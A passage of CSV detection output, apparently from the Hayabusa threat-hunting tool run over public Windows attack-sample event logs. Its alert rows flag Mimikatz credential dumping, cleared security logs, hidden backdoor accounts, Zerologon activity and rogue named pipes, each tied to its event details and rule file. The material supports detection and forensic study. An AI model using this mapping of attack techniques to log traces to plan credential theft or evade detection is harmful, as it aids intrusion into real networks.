747F3D96-130C-5F54-1300-00000000E600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx 2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx 2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx 2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx 2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,../hayabusa-rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx 2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx 2020-09-14 23:44:14.393 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx 2020-09-14 23:46:33.690 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx 2020-09-14 23:48:28.683 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx 2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx 2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx 2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx 2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx 2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx 2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx 2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx 2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx 2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx 2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx 2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx 2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx 2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx 2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx 2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx 2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx 2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx 2020-09-21 06:22:24.799 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx 2020-09-24 01:49:26.469 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:16.703 +09:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:27.599 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:45.506 +09:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:51:27.552 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-27 22:19:54.244 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.250 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.257 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.264 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.272 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.286 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.293 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.299 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.314 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.322 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.328 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.343 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.350 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.364 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.371 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.377 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.385 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.399 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:20:11.245 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:20:11.247 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:42:00.726 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 